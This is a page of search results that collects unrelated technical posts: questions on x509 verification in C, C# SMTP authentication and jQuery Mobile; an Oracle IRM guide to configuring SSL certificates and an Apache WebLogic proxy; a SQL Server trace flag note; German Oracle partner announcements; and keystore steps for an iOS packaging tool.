Search Results

Search found 604 results on 25 pages for 'hugo der hungrige'.

Page 18/25 | < Previous Page | 14 15 16 17 18 19 20 21 22 23 24 25  | Next Page >

  • x509 certificate verification in C

    - by sid
    Hi All, I do have certificates in DER and PEM format, My goal is to retrieve the fields of Issuer and Subject And verify the Certificate with the CA public key and simultaneously verify CA certificate with the Root public key. I am able to retrieve all the details of issuer and subject But unable to verify the certificate. Please help. The API's used, x509 = d2i_X509_fp (fp, &x509); //READING DER Format x509 = PEM_read_X509 (fp, &x509, NULL, NULL); //READING PEM Format X509_NAME_oneline(X509_get_subject_name(x509), subject, sizeof (subject)); //to retrive the Subject X509_NAME_oneline(X509_get_issuer_name(x509), issuer, sizeof (issuer)); //to retrive the Issuer // to store the CA public key (in unsigned char *key)that will be used to verify the certificate (My case Always sha1WithRSAEncryption) RSA *x = X509_get_pubkey(x509)->pkey.rsa; bn = x->n; //extracts the bytes from public key & convert into unsigned char buffer buf_len = (size_t) BN_num_bytes (bn); stored_CA_pubKey = (unsigned char *)malloc (buf_len); i_n = BN_bn2bin (bn, (unsigned char *)stored_CA_pubKey); if (i_n != buf_len) LOG(ERROR," : key error\n"); if (key[0] & 0x80) LOG(DEBUG, "00\n"); stored_CA_pubKeyLen = EVP_PKEY_size(X509_get_pubkey(x509)); For Verification I went through different approaches but unable to verify a) i_x509_verify = X509_verify(cert_x509, ca_pubkey); b) /* verify the signature */ int iRet1, iRet2, iReason; iRet1 = EVP_VerifyInit(&md_ctx, EVP_sha1()); iRet2 = EVP_VerifyUpdate(&md_ctx, cert_code, cert_code_len); rv = EVP_VerifyFinal(&md_ctx, (const unsigned char *)stored_CA_pubKey, stored_CA_pubKeyLen, cert_pubkey); NOTE : cert_code & stored_CA_pubKey is unsigned char buffer. Thanks in Advance

    Read the article

  • c# Sending emails with authentication. standard approach not working

    - by Ready Cent
    I am trying to send an email using the following very standard code. However, I get the error that follow... MailMessage message = new MailMessage(); message.Sender = new MailAddress("[email protected]"); message.To.Add("[email protected]"); message.Subject = "test subject"; message.Body = "test body"; SmtpClient client = new SmtpClient(); client.Host = "mail.myhost.com"; //client.Port = 587; NetworkCredential cred = new NetworkCredential(); cred.UserName = "[email protected]"; cred.Password = "correct password"; cred.Domain = "mail.myhost.com"; client.Credentials = cred; client.UseDefaultCredentials = false; client.Send(message); Mailbox unavailable. The server response was: No such user here. This recipient email address definitely works. To make this account work I had to do some special steps in outlook. Specifically, I had to do change account settings - more settings - outgoing server - my outgoing server requires authentication & use same settings. I am wondering if there is some other strategy. I think the key here is that my host is Server Intellect and I know that some people on here use them so hopefully someone else has been able to get through this. I did talk to support but they said with coding issues I am on my own :o

    Read the article

  • Adding dynamic content with events in jquerymobile

    - by Christian Waidner
    Currently I'm stuck with a problem in jquerymobile: I'm adding items to a list dynamically and use enhanceWithin() in the end (so styling is correct). After this I like to add click-events for each list item but the problem is, that enhanceWithin runs asynchronous and so I always get the error message "cannot call methods on checkboxradio prior to initialization; attempted to call method 'refresh'" When I delay the event-adding-code it works perfectly. Does anyone have an idea if there is a enhanceWithin.done event or anything else I can use? HTML: ... <div id="shoppinglist">Loading list...</div> ... Javascript: function updateList() { var result = ""; $.each(shoppinglistItems, function (index, item) { result += '<label><input type="checkbox" ' + item.checked + ' id="item_' + item.id + '">' + item.name + '</label>\n'; }); $('#shoppinglist').html(result).enhanceWithin(); // Change-Events an die Checkboxen knoten $('input[id*=item_]').unbind('change').bind('change', function (event) { var itemid = $(this).attr('id'); itemid = (itemid.split('_'))[1]; // Nur die Zahl extrahieren // Passendes Item aus der Liste der Items suchen und checken $.each(shoppinglistItems, function (index, item) { if (item.id == itemid) { item.checked = "checked"; item.timestamp = moment().format("YYYYMMDDHHmmss"); } }); updateList(); }); }

    Read the article

  • Quick guide to Oracle IRM 11g: Configuring SSL

    - by Simon Thorpe
    Quick guide to Oracle IRM 11g index So far in this guide we have an IRM Server up and running, however I skipped over SSL configuration in the previous article because I wanted to focus in more detail now. You can, if you wish, not bother with setting up SSL, but considering this is a security technology it is worthwhile doing. Contents Setting up a one way, self signed SSL certificate in WebLogic Setting up an official SSL certificate in Apache 2.x Configuring Apache to proxy traffic to the IRM server There are two common scenarios in which an Oracle IRM server is configured. For a development or evaluation system, people usually communicate directly to the WebLogic Server running the IRM service. However in a production environment and for some proof of concept evaluations that require a setup reflecting a production system, the traffic to the IRM server travels via a web server proxy, commonly Apache. In this guide we are building an Oracle Enterprise Linux based IRM service and this article will go over the configuration of SSL in WebLogic and also in Apache. Like in the past articles, we are going to use two host names in the configuration below,irm.company.com will refer to the public Apache server irm.company.internal will refer to the internal WebLogic IRM server Setting up a one way, self signed SSL certificate in WebLogic First lets look at creating just a simple self signed SSL certificate to be used in WebLogic. This is a quick and easy way to get SSL working in your environment, however the downside is that no browsers are going to trust this certificate you create and you'll need to manually install the certificate onto any machine's communicating with the server. This is fine for development or when you have only a few users evaluating the system, but for any significant use it's usually better to have a fully trusted certificate in use and I explain that in the next section. But for now lets go through creating, installing and testing a self signed certificate. We use a library in Java to create the certificates, open a console and running the following commands. Note you should choose your own secure passwords whenever you see password below. [oracle@irm /] source /oracle/middleware/wlserver_10.3/server/bin/setWLSEnv.sh [oracle@irm /] cd /oracle/middleware/user_projects/domains/irm_domain/config/fmwconfig/ [oracle@irm /] java utils.CertGen -selfsigned -certfile MyOwnSelfCA.cer -keyfile MyOwnSelfKey.key -keyfilepass password -cn "irm.oracle.demo" [oracle@irm /] java utils.ImportPrivateKey -keystore MyOwnIdentityStore.jks -storepass password -keypass password -alias trustself -certfile MyOwnSelfCA.cer.pem -keyfile MyOwnSelfKey.key.pem -keyfilepass password [oracle@irm /] keytool -import -trustcacerts -alias trustself -keystore TrustMyOwnSelf.jks -file MyOwnSelfCA.cer.der -keyalg RSA We now have two Java Key Stores, MyOwnIdentityStore.jks and TrustMyOwnSelf.jks. These contain keys and certificates which we will use in WebLogic Server. Now we need to tell the IRM server to use these stores when setting up SSL connections for incoming requests. Make sure the Admin server is running and login into the WebLogic Console at http://irm.company.intranet:7001/console and do the following; In the menu on the left, select the + next to Environment to expose the submenu, then click on Servers. You will see two servers in the list, AdminServer(admin) and IRM_server1. If the IRM server is running, shut it down either by hitting CONTROL + C in the console window it was started from, or you can switch to the CONTROL tab, select IRM_server1 and then select the Shutdown menu and then Force Shutdown Now. In the Configuration tab select IRM_server1 and switch to the Keystores tab. By default WebLogic Server uses it's own demo identity and trust. We are now going to switch to the self signed one's we've just created. So select the Change button and switch to Custom Identity and Custom Trust and hit save. Now we have to complete the resulting fields, the setting's i've used in my evaluation server are below. IdentityCustom Identity Keystore: /oracle/middleware/user_projects/domains/irm_domain/config/fmwconfig/MyOwnIdentityStore.jks Custom Identity Keystore Type: JKS Custom Identity Keystore Passphrase: password Confirm Custom Identity Keystore Passphrase: password TrustCustom Trust Keystore: /oracle/middleware/user_projects/domains/irm_domain/config/fmwconfig/TrustMyOwnSelf.jks Custom Trust Keystore Type: JKS Custom Trust Keystore Passphrase: password Confirm Custom Trust Keystore Passphrase: password Now click on the SSL tab for the IRM_server1 and enter in the alias and passphrase, in my demo here the details are; IdentityPrivate Key Alias: trustself Private Key Passphrase: password Confirm Private Key Passphrase: password And hit save. Now lets test a connection to the IRM server over HTTPS using SSL. Go back to a console window and start the IRM server, a quick reminder on how to do this is... [oracle@irm /] cd /oracle/middleware/user_projects/domains/irm_domain/bin [oracle@irm /] ./startManagedWeblogic IRM_server1 Once running, open a browser and head to the SSL port of the server. By default the IRM server will be listening on the URL https://irm.company.intranet:16101/irm_rights. Note in the example image on the right the port is 7002 because it's a system that has the IRM services installed on the Admin server, this isn't typical (or advisable). Your system is going to have a separate managed server which will be listening on port 16101. Once you open this address you will notice that your browser is going to complain that the server certificate is untrusted. The images on the right show how Firefox displays this error. You are going to be prompted every time you create a new SSL session with the server, both from the browser and more annoyingly from the IRM Desktop. If you plan on always using a self signed certificate, it is worth adding it to the Windows certificate store so that when you are accessing sealed content you do not keep being informed this certificate is not trusted. Follow these instructions (which are for Internet Explorer 8, they may vary for your version of IE.) Start Internet Explorer and open the URL to your IRM server over SSL, e.g. https://irm.company.intranet:16101/irm_rights. IE will complain that about the certificate, click on Continue to this website (not recommended). From the IE Tools menu select Internet Options and from the resulting dialog select Security and then click on Trusted Sites and then the Sites button. Add to the list of trusted sites a URL which mates the server you are accessing, e.g. https://irm.company.intranet/ and select OK. Now refresh the page you were accessing and next to the URL you should see a red cross and the words Certificate Error. Click on this button and select View Certificates. You will now see a dialog with the details of the self signed certificate and the Install Certificate... button should be enabled. Click on this to start the wizard. Click next and you'll be asked where you should install the certificate. Change the option to Place all certificates in the following store. Select browse and choose the Trusted Root Certification Authorities location and hit OK. You'll then be prompted to install the certificate and answer yes. You also need to import the root signed certificate into the same location, so once again select the red Certificate Error option and this time when viewing the certificate, switch to the Certification Path tab and you should see a CertGenCAB certificate. Select this and then click on View Certificate and go through the same process as above to import the certificate into the store. Finally close all instances of the IE browser and re-access the IRM server URL again, this time you should not receive any errors. Setting up an official SSL certificate in Apache 2.x At this point we now have an IRM server that you can communicate with over SSL. However this certificate isn't trusted by any browser because it's path of trust doesn't end in a recognized certificate authority (CA). Also you are communicating directly to the WebLogic Server over a non standard SSL port, 16101. In a production environment it is common to have another device handle the initial public internet traffic and then proxy this to the WebLogic server. The diagram below shows a very simplified view of this type of deployment. What i'm going to walk through next is configuring Apache to proxy traffic to a WebLogic server and also to use a real SSL certificate from an official CA. First step is to configure Apache to handle incoming requests over SSL. In this guide I am configuring the IRM service in Oracle Enterprise Linux 5 update 3 and Apache 2.2.3 which came with OpenSSL and mod_ssl components. Before I purchase an SSL certificate, I need to generate a certificate request from the server. Oracle.com uses Verisign and for my own personal needs I use cheaper certificates from GoDaddy. The following instructions are specific to Apache, but there are many references out there for other web servers. For Apache I have OpenSSL and the commands are; [oracle@irm /] cd /usr/bin [oracle@irm bin] openssl genrsa -des3 -out irm-apache-server.key 2048 Generating RSA private key, 2048 bit long modulus ............................+++ .........+++ e is 65537 (0x10001) Enter pass phrase for irm-apache-server.key: Verifying - Enter pass phrase for irm-apache-server.key: [oracle@irm bin] openssl req -new -key irm-apache-server.key -out irm-apache-server.csr Enter pass phrase for irm-apache-server.key: You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [GB]:US State or Province Name (full name) [Berkshire]:CA Locality Name (eg, city) [Newbury]:San Francisco Organization Name (eg, company) [My Company Ltd]:Oracle Organizational Unit Name (eg, section) []:Security Common Name (eg, your name or your server's hostname) []:irm.company.com Email Address []:[email protected] Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []:testing An optional company name []: You must make sure to remember the pass phrase you used in the initial key generation, you will need this when later configuring Apache. In the /usr/bin directory there are now two new files. The irm-apache-server.csr contains our certificate request and is what you cut and paste, or upload, to your certificate authority when you purchase and validate your SSL certificate. In response you will typically get two files. Your server certificate and another certificate file that will likely contain a set of certificates from your CA which validate your certificate's trust. Next we need to configure Apache to use these files. Typically there is an ssl.conf file which is where all the SSL configuration is done. On my Oracle Enterprise Linux server this file is located in /etc/httpd/conf.d/ssl.conf and i've added the following lines. <VirtualHost irm.company.com> # Setup SSL for irm.company.com ServerName irm.company.com SSLEngine On SSLCertificateFile /oracle/secure/irm.company.com.crt SSLCertificateKeyFile /oracle/secure/irm.company.com.key SSLCertificateChainFile /oracle/secure/gd_bundle.crt </VirtualHost> Restarting Apache (apachectl restart) and I can now attempt to connect to the Apache server in a web browser, https://irm.company.com/. If all is configured correctly I should now see an Apache test page delivered to me over HTTPS. Configuring Apache to proxy traffic to the IRM server Final piece in setting up SSL is to have Apache proxy requests for the IRM server but do so securely. So the requests to Apache will be over HTTPS using a legitimate certificate, but we can also configure Apache to proxy these requests internally across to the IRM server using SSL with the self signed certificate we generated at the start of this article. To do this proxying we use the WebLogic Web Server plugin for Apache which you can download here from Oracle. Download the zip file and extract onto the server. The file extraction reveals a set of zip files, each one specific to a supported web server. In my instance I am using Apache 2.2 32bit on an Oracle Enterprise Linux, 64 bit server. If you are not sure what version your Apache server is, run the command /usr/sbin/httpd -V and you'll see version and it its 32 or 64 bit. Mine is a 32bit server so I need to extract the file WLSPlugin1.1-Apache2.2-linux32-x86.zip. The from the resulting lib folder copy the file mod_wl.so into /usr/lib/httpd/modules/. First we want to test that the plug in will work for regular HTTP traffic. Edit the httpd.conf for Apache and add the following section at the bottom. LoadModule weblogic_module modules/mod_wl.so <IfModule mod_weblogic.c>    WebLogicHost irm.company.internal    WebLogicPort 16100    WLLogFile /tmp/wl-proxy.log </IfModule> <Location /irm_rights>    SetHandler weblogic-handler </Location> <Location /irm_desktop>    SetHandler weblogic-handler </Location> <Location /irm_sealing>    SetHandler weblogic-handler </Location> <Location /irm_services>    SetHandler weblogic-handler </Location> Now restart Apache again (apachectl restart) and now open a browser to http://irm.company.com/irm_rights. Apache will proxy the HTTP traffic from the port 80 of your Apache server to the IRM service listening on port 16100 of the WebLogic Managed server. Note above I have included all four of the Locations you might wish to proxy. http://irm.company.internalirm_rights is the URL to the management website, /irm_desktop is the URL used for the IRM Desktop to communicate. irm_sealing is for web services based document sealing and irm_services is for IRM server web services. The last two are typically only used when you have the IRM server integrated with another application and it is unlikely you'd be accessing these resources from the public facing Apache server. However, just in case, i've mentioned them above. Now let's enable SSL communication from Apache to WebLogic. In the ZIP file we extracted were some more modules we need to copy into the Apache folder. Looking back in the lib that we extracted, there are some more files. Copy the following into the /usr/lib/httpd/modules/ folder. libwlssl.so libnnz11.so libclntsh.so.11.1 Now the documentation states that should only need to do this, but I found that I also needed to create an environment variable called LD_LIBRARY_PATH and point this to the folder /usr/lib/httpd/modules/. If I didn't do this, starting Apache with the WebLogic module configured to SSL would throw the error. [crit] (20014)Internal error: WL SSL Init failed for server: (null) on 0 So I had to edit the file /etc/profile and add the following lines at the bottom. You may already have the LD_LIBRARY_PATH variable defined, therefore simply add this path to it. LD_LIBRARY_PATH=/usr/lib/httpd/modules/ export LD_LIBRARY_PATH Now the WebLogic plug in uses an Oracle Wallet to store the required certificates.You'll need to copy the self signed certificate from the IRM server over to the Apache server. Copy over the MyOwnSelfCA.cer.der into the same folder where you are storing your public certificates, in my example this is /oracle/secure. It's worth mentioning these files should ONLY be readable by root (the user Apache runs as). Now lets create an Oracle Wallet and import the self signed certificate from the IRM server. The file orapki was included in the bin folder of the Apache 1.1 plugin zip you extracted. orapki wallet create -wallet /oracle/secure/my-wallet -auto_login_only orapki wallet add -wallet /oracle/secure/my-wallet -trusted_cert -cert MyOwnSelfCA.cer.der -auto_login_only Finally change the httpd.conf to reflect that we want the WebLogic Apache plug-in to use HTTPS/SSL and not just plain HTTP. <IfModule mod_weblogic.c>    WebLogicHost irm.company.internal    WebLogicPort 16101    SecureProxy ON    WLSSLWallet /oracle/secure/my-wallet    WLLogFile /tmp/wl-proxy.log </IfModule> Then restart Apache once more and you can go back to the browser to test the communication. Opening the URL https://irm.company.com/irm_rights will proxy your request to the WebLogic server at https://irm.company.internal:16101/irm_rights. At this point you have a fully functional Oracle IRM service, the next step is to create a sealed document and test the entire system.

    Read the article

  • adress-chunk: separate data stored in one collumn - into three (street, postal-code, town)

    - by zero
    hello dear community. Hello dear friends form all over the planet first of all - this is a great great forum. I like this place to share the ideas. It is so great to see such a supportive place - featuring the knowledge exchange! today i have the following thing to discuss: i want to separate the following data that are stored in one column of a calc-spreadsheet: See the following data: You see that there are the following categories:_ steet, postal-code, town All the data are stored in only one Colum; Well to be honest: i want to separate them into three colums steet, postal-code, town see the data: what can i do? note - you see that there are commas inbetween the enties: and besides this we see that we have a postal-code with four digits: that is a good thing. Perhaps we can use this as a marker that helps us to separate the data?! Perhaps See a data-sample! Here you can see some exceptions: eg. the town that has two words combinde with a "-" ... or somethims without any signs and characters... see the following... as an example: Max-Bader-Platz 1, 5620 Schwarzach im Pongau Pestalozzistraße 4, 9990 Nussdorf-Debant Schulstraße 4, 5162 Obertrum am See But i guess that this means no problem... What do you think about this? I am very very interested to get your opinion! i look forward to hear from you! regards see a snipped of the dataset - that is stored in one column -[b]Goal: [/b]i want to separate the datas into three collumns... : Schulweg 6, 9871 Seeboden Khevenhüllerstraße 45, 4861 Schörfling Franz Xaver Rennstr.18, 6460 Imst Schulstraße 4, 5162 Obertrum am See Schulweg 6, 7432 Oberschützen Pestalozzistraße 4, 9990 Nussdorf-Debant Niederndorf bei Kufstein 53c, 6342 Niederndorf bei Kufstein Hauptschulstraße 18, 2183 Neusiedl an der Zaya Seeweg 14, 5202 Neumarkt am Wallersee Europaplatz 1, 8820 Neumarkt in Steiermark Schulstraße 7, 4212 Neumarkt im Mühlkreis Schulstraße 20, 4720 Neumarkt im Hausruckkreis Bahnhofstr. 10, 4872 Neukirchen an der Vöckla Schulstraße 5b, 4780 Schärding Reitbergstraße 2, 4311 Schwertberg Europaplatz 1, 2320 Schwechat Am Schulberg 5, 3931 Schweiggers Waidach 8, 6130 Schwaz Waidach 8, 6130 Schwaz Max-Bader-Platz 1, 5620 Schwarzach im Pongau Markt 29, 2662 Schwarzau im Gebirge Hofsteigstraße 68, 6858 Schwarzach Gmundner Straße 7, 4690 Schwanenstadt Mühlfeldstraße 1, 4690 Schwanenstadt Mainsdorferstraße 18, 8541 Schwanberg Jakob Stemer-Weg 3, 6780 Schruns Obere Umfahrungsstraße 16, 2432 Schwadorf bei Wien Battloggstraße 54, 6780 Schruns Schloss-Straße 19, 5020 Salzburg Schillerplatz 2, 8280 Fürstenfeld Erzherzog-Johann-Str. 400, 8970 Schladming Schulgasse 261, 8811 Scheifling i look forward to hear from you!! regards

    Read the article

  • Is there extensible structured file analyzer, like network analysis tools?

    - by ???
    There are many network analysis tools like Wireshark, Sniffer Pro, Omnipeak which can dump the packet data in structured manner. I'm just writing my own file analyzer for general purpose, which can dump JPEG, PNG, EXE, ELF, ASN.1 DER encoded files, etc. in tree style. There are so many file formats in the world that I can't handle them all. So I'm wondering if there's some software already there, with pluggable architecture and a large established file format repository?

    Read the article

  • Trace Flag 610 – When should you use it?

    - by simonsabin
    Thanks to Marcel van der Holst for providing this great information on the use of Trace Flag 610. This trace flag can be used to have minimal logging into a b tree (i.e. clustered table or an index on a heap) that already has data. It is a trace flag because in testing they found some scenarios where it didn’t perform as well. Marcel explains why below. “ TF610 can be used to get minimal logging in a non-empty B-Tree. The idea is that when you insert a large amount of data, you don't want to...(read more)

    Read the article

  • Die “AfterDark Reception” ist wieder da!

    - by A&C Redaktion
    In diesem Jahr erreicht die OPN Exchange “AfterDark” Reception neue Höhen! Denn diesmal findet der exklusive VIP-Event im 5. Stock des Metreon Building in San Francisco statt. Und zwar am Sonntag, 30. September, von 19.30 bis 22 Uhr. Genießen Sie in tollem Ambiente und bei einem Cocktail den sanften Sound von Macy Gray, während Sie den Tag beim Networking ausklingen lassen - mit Blick auf das 2012 live Music Festival. Und das Beste ist: Als Oracle PartnerNetwork Exchange Teilnehmer können Sie exklusiv und kostenlos dabei sein! Begleiten Sie uns, wenn wir die Oracle OpenWorld 2012 mit guten Gesprächen und toller Musik beginnen. Wir sehen uns - nach Sonnenuntergang! Ihr OPN Communications Team

    Read the article

  • Matthias Weiss: Virtualisierung - auf allen Ebenen. Da ist Potential im Mittelstand.

    - by A&C Redaktion
    Vom Storage, über den Server bis hin zum Desktop. Virtualisierung ist nur eine Technologie, intelligent die Ressourcen zu managen. Es ist gerade das Potenzial der Kostenersparnis, so Matthias Weiss, Direktor Mittelstand Technologie, das gerade bei mittelständischen Unternehmen Virtualisierung so begehrt macht. Es gibt heute bereits Virtualisierungslösungen von Oracle, die neue Chancen zur Umsatzsteigerung für Beratungsleistungen ermöglichen.  Wie sich die langfristige IT-Strategie bei mittelständischen Unternehmen durch Partner positiv beeinflussen lässt? Eine Frage, auf die Matthias Weiss auch eine Antwort im folgenden Video bereit hält.

    Read the article

  • Blicken Sie über den Tellerrand hinaus. Da sind neue Märkte.

    - by A&C Redaktion
    Über 60 Spezialisierungen wird es bis Ende des Jahres bei Oracle geben. Thomas Gartner, Senior Vertriebsleiter Business Partner, macht angesichts dieser Zahl eine einfache Rechnung auf. In den angestammten Märkten tummeln sich zahlreiche Partner, die miteinander im Wettbewerb stehen. Wer jetzt, so Gartner, über den Tellerrand hinaus schaue, neue Möglichkeiten für sein Unternehmen recherchiert, der gewinnt in mehrfacher Hinsicht: Erstens gibt es zahlreiche Märkte, die noch erhebliches Wachstumspotenzial bieten. Zweitens entstehen neue Nischen, die sich über gezielte Differenzierung und Spezialisierung lukrativ erschließen lassen. Drittens unterstützt das Team von Thomas Gartner engagierte Business Partner gerne mit einem individuellen Vertriebscoaching, damit es noch schneller geht, mit dem gewünschten Wachstum. Hier geht es zum Blick über den Tellerrand hinaus.

    Read the article

  • AIA und die "IT Strategies from Oracle"

    - by Hans Viehmann
    Die Oracle Application Integration Architecture lässt sich gut nutzen, um eine SOA Initiative zügig zu starten. Naturgemäß berücksichtigt sie aber nicht alle Aspekte einer IT Strategie. Zu diesem Thema gibt es nun seit einigen Wochen eine umfassende Bibliothek von Handbüchern ("Practitioner's Guides") und Referenz-Architekturen, in denen die Erfahrung aus zahlreichen Projekten zusammengefasst ist.Hier ist beispielsweise ein IT Governance Framework beschrieben, das auch die wesentlichen Aspekte der SOA GovernanceSOA Portfolio GovernanceService Lifecycle GovernanceSOA Solution Lifecycle GovernanceSOA Vitality GovernanceSOA Organization Governancenäher beschreibt.In den Handbüchern sind zahlreiche wertvolle Hinweise und best practices enthalten; ich denke, es lohnt sich, einen Blick hinein zu werfen.Die gesamte Bibliothek findet sich unter http://www.oracle.com/goto/itstrategies; eine Übersicht über die verschiedenen Aspekte ist in dem Bild unten zusammengefasst.View image

    Read the article

  • Oracle Alliances & Channels wünscht allen Partnern ein frohes Fest!

    - by A&C Redaktion
    Endlich!Die letzten Projekte sind erledigt, die Geschenke verpackt und auch in den Sphären des Web 2.0 soll nun etwas Ruhe und Weihnachtsstimmung einkehren. Ich möchte daher gar nicht viele Worte verlieren: Es liegt ein arbeitsreiches Jahr hinter uns und es galt viele Herausforderungen zu meistern. Vor allem in der eigentlich geruhsamen Adventszeit wird es viel zu hektisch. Aber gerade dann ist es umso wichtiger, kurz innezuhalten. Wir haben viel geschafft und sollten nun, für die Festtage, auch die Bürotür im Kopf schließen. Dann kann es endlich Weihnachten werden!Im Namen von Oracle Alliances & Channels bedanke ich mich für die gute Zusammenarbeit. Ich wünsche Ihnen und Ihren Lieben ein frohes Fest und schöne, erholsame Feiertage!Herzlich,Ihre Silvia KaskeSenior Director Channel Sales & AlliancesORACLE Deutschland B.V. & Co. KG

    Read the article

  • dotnet Cologne 2011 - Call for Papers

    - by WeigeltRo
    Am 6. Mai 2011 findet im MediaPark Köln die dotnet Cologne 2011 statt, die große .NET Community Konferenz in Deutschland. Bereits zum dritten Mal organisieren die .NET User Groups aus Köln und Bonn einen ganzen Tag voll mit Vorträgen rund um .NET. Damit diese Konferenz von Entwicklern für Entwickler wieder ein solcher Erfolg wie im letzten Jahr wird, suchen wir (Stefan Lange, Albert Weinert und ich) noch Sprecher mit interessanten Vorträgen – von der Einführung in neue Themen bis hin zur Level 400 “Hardcore” Session zu etablierten Technologien. Wer Interesse hat: Alle Infos zum Call for Papers gibt es hier.

    Read the article

  • Oracle Dojos: Oracle Wissen - Kompakt und Kostenlos

    - by Anne Manke
    Die kleinen, roten Oracle-DOJOS geben einen kurzen und kompakten Überblick über Oracle Technologien. Jedes Dojo greift dabei ein spezielles Themengebiet auf. Ob zum Thema Enterprise Manager 12c und Cloud Control oder Big Data Einführung, die Oracle Dojos geben Informationen über Theorie und Praxis, Tipps und Hinweise - alles in handlicher Form.  Die Dojos gibt es entweder online als PDF oder als kleine Büchlein (siehe Foto). Die bekommen Sie unseren Oracle-Veranstaltungen oder direkt bei uns. Holen Sie sich Ihr eigenes Dojo und rufen Sie uns noch heute an! Übrigens: "Dojo" ist japanisch und bedeutet Übungsraum oder Übungshalle. Und so wollen die Dojos auch gesehen werden: als Übungsbuch zur Erweiterung und Verbesserung des eigenen Wissens und der eigenen Fähigkeiten.     

    Read the article

  • dotnet Cologne 2013 – Vorträge gesucht!

    - by WeigeltRo
    Am 3. Mai 2013 findet im Mediapark Köln die dotnet Cologne 2013 statt. Damit die mittlerweile fünfte Ausgabe dieser Community-Konferenz wieder ein solcher Erfolg wie in den Vorjahren wird, suchen wir (Stefan Lange, Melanie Eibl, Albert Weinert und ich) Sprecher mit interessanten Vorträgen zu Technologien aus dem Microsoft-Umfeld. Dabei wünschen wir uns sowohl Einführungsvorträge in neue Themen als auch die eine oder andere “Level 400 Hardcore-Session” für Spezialisten. Für beides sind passende Räume im Komed vorhanden, das auch in diesem Jahr wieder Veranstaltungsort sein wird. Alle Infos zum Call for Papers gibt es hier. Über die dotnet Cologne Die dotnet Cologne, die 2009 zum ersten Mal stattfand, hat sich im Laufe der Jahre mit mittlerweile 350 Teilnehmern zur größten .NET Community-Konferenz in Deutschland entwickelt. Veranstaltet von den .NET User Groups Bonn-to-Code.Net und .net user group Köln, versteht sich die dotnet Cologne als Konferenz von Entwicklern für Entwickler.

    Read the article

  • iPack -The iOS Application Packager

    - by user13277780
    iOS applications are distributed in .ipa archive files. These files are regular zip files which contain application resources and executable-s. To protect them from unauthorized modifications and to provide identification of their sources, the content of the archives is signed. The signature is included in the application executable of an.ipa archive and protects the executable file itself and the associated resource files. Apple provides native Mac OS tools for signing iOS executable-s (which are actually generic Mach-O code signing tools), but these tools are not generally available on other platforms. To provide a multi-platform development environment for JavaFX based iOS applications, we ported iOS signing and packaging to Java and created a dedicated ipack tool for it. The iPack tool can be used as a last step of creating .ipa package on various operating systems. Prototype has been tested by creating a final distributable for JavaFX application that runs on iPad, all done on Windows 7. Source Code The source code of iPac tool is in OpenJFX project repository. You can find it in: <openjfx root>/rt/tools/ios/Maven/ipack To build the iPack tool use: rt/tools/ios/Maven/ipack$ mvn package After building, you can run the tool: java -jar <path to ipack.jar> <arguments>  Signing keystore The tool uses a java key store to read the signing certificate and the associated private key. To prepare such keystore users can use keytool from JDK. One possible scenario is to import an existing private key and the certificate from a key store used on Mac OS: To list the content of an existing key store and identify the source alias: keytool -list -keystore <src keystore>.p12 -storetype pkcs12 -storepass <src keystore password> To create Java key store and import the private key with its certificate to the keys store: keytool -importkeystore \ -destkeystore <dst keystore> -deststorepass <dst keystore password> \ -srckeystore <src keystore>.p12 -srcstorepass <src keystore password> -srcstoretype pkcs12 \ -srcalias <src alias> -destalias <dst alias> -destkeypass <dst key password> Another scenario would be to generate a private / public key pair directly in a Java key store and create a certificate request from it. After sending the request to Apple one can then import the certificate response back to the Java key store and complete the signing certificate entry. In both scenarios the resulting alias in the Java key store will contain only a single (leaf) certificate. This can be verified with the following command: keytool -list -v -keystore <ipack keystore> -storepass <keystore password> When looking at the Certificate chain length entry, the number next to it is 1. When an executable file is signed on Mac OS, the resulting signature (in CMS format) includes the whole certificate chain up to the Apple Root CA. The ipack tool includes only the chain which is stored under the alias specified on the command line. So to have the whole chain in the signature we need to replace the single certificate entry under the alias with the corresponding full certificate chain. To do that we need first to create the chain in a separate file. It is easy to create such chain when working with certificates in Base-64 encoded PEM format. A certificate chain can be created by concatenating PEM certificates, which should form the chain, into a single file. For iOS signing we need the following certificates in our chain: Apple Root CA Apple Worldwide Developer Relations CA Our signing leaf certificate To convert a certificate from the binary DER format (.der, .cer) to PEM format: keytool -importcert -noprompt -keystore temp.ks -storepass temppwd -alias tempcert -file <certificate>.cer keytool -exportcert -keystore temp.ks -storepass temppwd -alias tempcert -rfc -file <certificate>.pem To export the signing certificate into PEM format: keytool -exportcert -keystore <ipack keystore> -storepass <keystore password> -alias <signing alias> -rfc -file SigningCert.pem After constructing a chain from AppleIncRootCertificate.pem, AppleWWDRCA.pem andSigningCert.pem, it can be imported back into the keystore with: keytool -importcert -noprompt -keystore <ipack keystore> -storepass <keystore password> -alias <signing alias> -keypass <key password> -file SigningCertChain.pem To summarize, the following example shows the full certificate chain replacement process: keytool -importcert -noprompt -keystore temp.ks -storepass temppwd -alias tempcert1 -file AppleIncRootCertificate.cer keytool -exportcert -keystore temp.ks -storepass temppwd -alias tempcert1 -rfc -file AppleIncRootCertificate.pem keytool -importcert -noprompt -keystore temp.ks -storepass temppwd -alias tempcert2 -file AppleWWDRCA.cer keytool -exportcert -keystore temp.ks -storepass temppwd -alias tempcert2 -rfc -file AppleWWDRCA.pem keytool -exportcert -keystore ipack.ks -storepass keystorepwd -alias mycert -rfc -file SigningCert.pem cat SigningCert.pem AppleWWDRCA.pem AppleIncRootCertificate.pem >SigningCertChain.pem keytool -importcert -noprompt -keystore ipack.ks -storepass keystorepwd -alias mycert -keypass keypwd -file SigningCertChain.pem keytool -list -v -keystore ipack.ks -storepass keystorepwd Usage When the ipack tool is started with no arguments it prints the following usage information: -appname MyApplication -appid com.myorg.MyApplication     Usage: ipack <archive> <signing opts> <application opts> [ <application opts> ... ] Signing options: -keystore <keystore> keystore to use for signing -storepass <password> keystore password -alias <alias> alias for the signing certificate chain and the associated private key -keypass <password> password for the private key Application options: -basedir <directory> base directory from which to derive relative paths -appdir <directory> directory with the application executable and resources -appname <file> name of the application executable -appid <id> application identifier Example: ipack MyApplication.ipa -keystore ipack.ks -storepass keystorepwd -alias mycert -keypass keypwd -basedir mysources/MyApplication/dist -appdir Payload/MyApplication.app -appname MyApplication -appid com.myorg.MyApplication    

    Read the article

  • Oracle University Neue Kurse (Week 10)

    - by swalker
